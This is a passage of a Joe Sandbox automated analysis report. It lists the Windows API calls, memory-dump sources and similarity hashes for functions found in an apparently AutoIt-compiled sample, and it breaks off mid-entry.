        • Instruction Fuzzy Hash: A131E570915344AFEB66CF789859BE7BBECAB02308F10009ED6DEA3241C7F45A84CB51
        APIs
        • CloseHandle.KERNELBASE(00000000,00000000,?,?,002185CC,?,002A8CC8,0000000C), ref: 00218704
        • GetLastError.KERNEL32(?,002185CC,?,002A8CC8,0000000C), ref: 0021870E
        • __dosmaperr.LIBCMT ref: 00218739
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CloseErrorHandleLast__dosmaperr
        • String ID:
        • API String ID: 2583163307-0
        • Opcode ID: b8f4a94216b413673609c00bdfd8b3a9cacd0fdac31106591755b9af3e92e7ae
        • Instruction ID: 1790c2930664d18586f9e3fb93540f1c5ef6fd7e00972f67640cd9febdef0d3e
        • Opcode Fuzzy Hash: b8f4a94216b413673609c00bdfd8b3a9cacd0fdac31106591755b9af3e92e7ae
        • Instruction Fuzzy Hash: 91016B32A342B456D260663468C97FE67CD4BF1774F38029AF8188B1D2DEA0CCD28550
        APIs
        • TranslateMessage.USER32(?), ref: 001EDB7B
        • DispatchMessageW.USER32(?), ref: 001EDB89
        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EDB9F
        • Sleep.KERNELBASE(0000000A), ref: 001EDBB1
        • TranslateAcceleratorW.USER32(?,?,?), ref: 00231CC9
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Message$Translate$AcceleratorDispatchPeekSleep
        • String ID:
        • API String ID: 3288985973-0
        • Opcode ID: 7d7e0cc5a72e3956a15ca166e84b622f1196e464b32a09fe3679e8fc45b95384
        • Instruction ID: 464fd1aba7fa6f0ab823f12abc25ac61ae1501ed1844f12fc9778af03da58556
        • Opcode Fuzzy Hash: 7d7e0cc5a72e3956a15ca166e84b622f1196e464b32a09fe3679e8fc45b95384
        • Instruction Fuzzy Hash: 9FF05E306043819BE734CBB1EC99FEA73ACEB45310F604A19E60A830D0EB309498CB26
        APIs
        • GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,0025015C,00000000,?,00000000,?,0022249E,00000000), ref: 00250387
        • GetCurrentProcess.KERNEL32(?,00000000,?,0025015C,00000000,?,00000000,?,0022249E,00000000), ref: 0025038F
        • DuplicateHandle.KERNELBASE(00000000,?,0025015C,00000000,?,00000000,?,0022249E,00000000), ref: 00250396
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CurrentProcess$DuplicateHandle
        • String ID:
        • API String ID: 1294930198-0
        • Opcode ID: 14cdde6407f6bd71a8a202636113f0e0057239983ca321ed9423d71898df9876
        • Instruction ID: 0e00de7ddbde025c8e349d9db2ccf20ac1debf645ea2a6d555c3be2b8836873d
        • Opcode Fuzzy Hash: 14cdde6407f6bd71a8a202636113f0e0057239983ca321ed9423d71898df9876
        • Instruction Fuzzy Hash: 86D01276154305BBC7012B65AC4EF367A3CFB95F22F20406DFA0D991518A7054515624
        APIs
        • __Init_thread_footer.LIBCMT ref: 001F17F6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Init_thread_footer
        • String ID: CALL
        • API String ID: 1385522511-4196123274
        • Opcode ID: adba8810cf895a11cf13b48992d99aedeae3f8a171472ac0801336bf769d98c4
        • Instruction ID: ad8118f0d504e2c847239998ef359e4569f0ede00a46bcb7463b9690b5e4547a
        • Opcode Fuzzy Hash: adba8810cf895a11cf13b48992d99aedeae3f8a171472ac0801336bf769d98c4
        • Instruction Fuzzy Hash: A522ABB0608305EFC714DF14C494A3ABBF5BF99314F24896DF68A8B262D771E855CB82
        APIs
        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 001E3908
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: IconNotifyShell_
        • String ID:
        • API String ID: 1144537725-0
        • Opcode ID: 40f3546d6cfe516a504e41ddd7c7588deb7737c2face32758a548a3372623292
        • Instruction ID: 69a6935c9f8c9d37771731ec41f94d9b1981e489a64eab6d59e4472d0ce186b4
        • Opcode Fuzzy Hash: 40f3546d6cfe516a504e41ddd7c7588deb7737c2face32758a548a3372623292
        • Instruction Fuzzy Hash: 4531D570504741DFD320DF25E898B9BBBF4FB49708F000A6EF6A983240E771AA54CB52
        APIs
        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,0022249E,00000000), ref: 00250145
        • InterlockedExchange.KERNEL32(00000038,00000000), ref: 00250167
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
        • String ID:
        • API String ID: 4104817828-0
        • Opcode ID: 02f2369ca9848f17a017e146059ca72863087a88febc6ef1ab880a5f95f5bb1e
        • Instruction ID: deaf2231b0097bc8330885473f0fa74ef2649cc95bd89cab099b5530b00b57ec
        • Opcode Fuzzy Hash: 02f2369ca9848f17a017e146059ca72863087a88febc6ef1ab880a5f95f5bb1e
        • Instruction Fuzzy Hash: 99F03AB15017059FC3209F5AD948867FBFCFF95710B40882EE98A83A20C7B4B445CF90
        APIs
        • timeGetTime.WINMM ref: 001FF661
          • Part of subcall function 001ED730: GetInputState.USER32 ref: 001ED807
        • Sleep.KERNEL32(00000000), ref: 0023F2DE
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: InputSleepStateTimetime
        • String ID:
        • API String ID: 4149333218-0
        • Opcode ID: 6e8c052f7ea49a6c5bb57ec3288e0b07bbdceb2d571c30edf8eeef635c139f60
        • Instruction ID: b02bf553b29c41c18c7cb1915eeb45f45086c1a7d442326966e2890fee9e4b65
        • Opcode Fuzzy Hash: 6e8c052f7ea49a6c5bb57ec3288e0b07bbdceb2d571c30edf8eeef635c139f60
        • Instruction Fuzzy Hash: 9FF08C312446059FD314EF7AE449B6AB7E8EF55760F00002EE95EC7360DB70A840CB90
        APIs
          • Part of subcall function 001E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001E3A97,?,?,001E2E7F,?,?,?,00000000), ref: 001E3AC2
        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 00258564
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: FullNamePathPrivateProfileString
        • String ID:
        • API String ID: 1991638491-0
        • Opcode ID: 1daca1b849233c8cff6a749941095020a1ca0c2afc88c6db1c980af50c499d84
        • Instruction ID: fd3b8beeac7846e4d377cb6a340c81c1d655800e2717132ecf91ca6a63e10a5e
        • Opcode Fuzzy Hash: 1daca1b849233c8cff6a749941095020a1ca0c2afc88c6db1c980af50c499d84
        • Instruction Fuzzy Hash: 13215139600A05AFCB10EB55E846CAEB7B5FF59710B014454FA496B3A2DB30FE51CBD0
        APIs
          • Part of subcall function 001E4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001E4EDD,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E9C
          • Part of subcall function 001E4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001E4EAE
          • Part of subcall function 001E4E90: FreeLibrary.KERNEL32(00000000,?,?,001E4EDD,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4EC0
        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4EFD
          • Part of subcall function 001E4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00223CDE,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E62
          • Part of subcall function 001E4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001E4E74
          • Part of subcall function 001E4E59: FreeLibrary.KERNEL32(00000000,?,?,00223CDE,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E87
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Library$Load$AddressFreeProc
        • String ID:
        • API String ID: 2632591731-0
        • Opcode ID: 63f6c76f2a5f6871920b805d5bff87063f46984b0abd91cb852b8c8497d24c5f
        • Instruction ID: 15da10a227ebfa05d0a473c55b430ac19d8833c6ed82d68845b34914487b617a
        • Opcode Fuzzy Hash: 63f6c76f2a5f6871920b805d5bff87063f46984b0abd91cb852b8c8497d24c5f
        • Instruction Fuzzy Hash: 05113A32610705ABCF14FF75DC02FAD77A5AF50B10F20842DF542A61C1EF749A549B50
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: __wsopen_s
        • String ID:
        • API String ID: 3347428461-0
        • Opcode ID: 1b951e41e1d50f6706e7a9bdc7924c13b4365b38c684e58232e4436514367d73
        • Instruction ID: 108371e0e15755ae28c3b9ae956307ff798de3ab788850209f75207afdd94cd0
        • Opcode Fuzzy Hash: 1b951e41e1d50f6706e7a9bdc7924c13b4365b38c684e58232e4436514367d73
        • Instruction Fuzzy Hash: EA11187590410AAFCB15DF58E9819DA7BF5EF49314F104069F809AB312DA31EA21CBA5
        APIs
          • Part of subcall function 00214C7D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00212E29,00000001,00000364,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00214CBE
        • _free.LIBCMT ref: 0021506C
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: AllocateHeap_free
        • String ID:
        • API String ID: 614378929-0
        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
        • Instruction ID: fa724ccc5e4b8f88125a67bd34b864bfb579d22c171c3aa7cdc38bbb8a331b24
        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
        • Instruction Fuzzy Hash: C6012672214705ABE3218E699881ADAFBE9FBDD370F25055DE18483280EA70A855CAB4
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: bc4860cf511ebaca92fc42fdb963b24a02761f1dd9096020d144c68d3ad4ca46
        • Instruction ID: 7a7b1527afb5efbbcfee44ebbfb21cdace5d477a578e4a6988d1242fe2620448
        • Opcode Fuzzy Hash: bc4860cf511ebaca92fc42fdb963b24a02761f1dd9096020d144c68d3ad4ca46
        • Instruction Fuzzy Hash: 2CF04432531B149ADB313E69AC05B9A33CC8F62330F120B15F820931C3CB7198B68EA6
        APIs
        • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0025EF2A
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: EnvironmentVariable
        • String ID:
        • API String ID: 1431749950-0
        • Opcode ID: a0c5fb451ef133b59c5d8245fe037be7953125fb07bdc936fc797d163e350ec4
        • Instruction ID: 5fed60a64355b00e2c22e8639e4022e9af0fbba314b5227f1b58a62881a50ff7
        • Opcode Fuzzy Hash: a0c5fb451ef133b59c5d8245fe037be7953125fb07bdc936fc797d163e350ec4
        • Instruction Fuzzy Hash: B2F08175600205AFCB10EBA5DC4AD9F77A8EF55720F000059F6099B261EB70EE45CBA0
        APIs
        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00212E29,00000001,00000364,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00214CBE
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 182990196b4c2d6d852982945e0e524eee5e47388295f2bee5818f26fb606af4
        • Instruction ID: 599765d3c7f1718d13e830a3bc095fd7649008a7a51174ed988b1ede2a3eddc8
        • Opcode Fuzzy Hash: 182990196b4c2d6d852982945e0e524eee5e47388295f2bee5818f26fb606af4
        • Instruction Fuzzy Hash: A5F0E93163222667DB317F769C09BDA37C8BF717A0B148127BC1DA65D1CA70D8B086E0
        APIs
        • RtlAllocateHeap.NTDLL(00000000,?,?,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00213852
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 889ee6886653d9c37ef4b78ad675d525a765b90ddfe9e8a8a12b6ab2730b30fd
        • Instruction ID: 187ad6d4e72d4637e31371f99f346673e6462fa74027ef61d5e65e6feef51f88
        • Opcode Fuzzy Hash: 889ee6886653d9c37ef4b78ad675d525a765b90ddfe9e8a8a12b6ab2730b30fd
        • Instruction Fuzzy Hash: E7E0E53213022696D7316F769C08BDB37CBAB627B0F174131BD08928D1DB50DDB185E0
        APIs
        • FreeLibrary.KERNEL32(?,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4F6D
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: FreeLibrary
        • String ID:
        • API String ID: 3664257935-0
        • Opcode ID: caf5993e39ece7a8b162aae8d8a7259ffc784550e6b29b51182d9c0f07a0ef45
        • Instruction ID: ecac5d86b255d77338c6cca42dd6086d692b787229b18550e4a4ec178ec8213d
        • Opcode Fuzzy Hash: caf5993e39ece7a8b162aae8d8a7259ffc784550e6b29b51182d9c0f07a0ef45
        • Instruction Fuzzy Hash: 92F03071105B91CFDB389F6AE49481AB7E4AF14719321897EE1DA83511C7359C84DF50
        APIs
        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 001E314E
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: IconNotifyShell_
        • String ID:
        • API String ID: 1144537725-0
        • Opcode ID: d86401384a0c023c74a19a723a9219cc73109d49bc163836a3fd49ac331a6212
        • Instruction ID: 773180115c6534686b4923d22e68369612a6d4445ffaec8374fd25f00c63d217
        • Opcode Fuzzy Hash: d86401384a0c023c74a19a723a9219cc73109d49bc163836a3fd49ac331a6212
        • Instruction Fuzzy Hash: EBF0A0709143089FEB529B24EC4E7DA7BFCAB01708F1401E9A28897282EB705B98CF41
        APIs
        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001E2DC4
          • Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: LongNamePath_wcslen
        • String ID:
        • API String ID: 541455249-0
        • Opcode ID: edf899a85a0cd19f2220261b7297a1c758a55247069c5af6b9be5afe125ac0fd
        • Instruction ID: 10f23f7bdfaddaccde788d412aeee71039f319c1f3f60e1d13ebd5e8552b9231
        • Opcode Fuzzy Hash: edf899a85a0cd19f2220261b7297a1c758a55247069c5af6b9be5afe125ac0fd
        • Instruction Fuzzy Hash: 93E0CD726002246BC72092989C05FDA77DDDFC87D0F040075FD09D7258DA60ADC08550
        APIs
          • Part of subcall function 001E3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001E3908
          • Part of subcall function 001ED730: GetInputState.USER32 ref: 001ED807
        • SetCurrentDirectoryW.KERNEL32(?), ref: 001E2B6B
          • Part of subcall function 001E30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 001E314E
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: IconNotifyShell_$CurrentDirectoryInputState
        • String ID:
        • API String ID: 3667716007-0
        • Opcode ID: 914ca313710895bcdc38ba0ec738c5d090129054e9a13469e1742794a86455e2
        • Instruction ID: e4e8c04d9c18bf8c541aac8a533636372778ad3d8d69c5baa1deb78054cfc6a0
        • Opcode Fuzzy Hash: 914ca313710895bcdc38ba0ec738c5d090129054e9a13469e1742794a86455e2
        • Instruction Fuzzy Hash: 8FE026213006C403C604BB72B82A8ADB3599BF1351F80053EF06243162CF2049954311
        APIs
        • CreateThread.KERNELBASE(00000000,00000000,Function_0007092A,00000000,00000000,?), ref: 0025095F
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
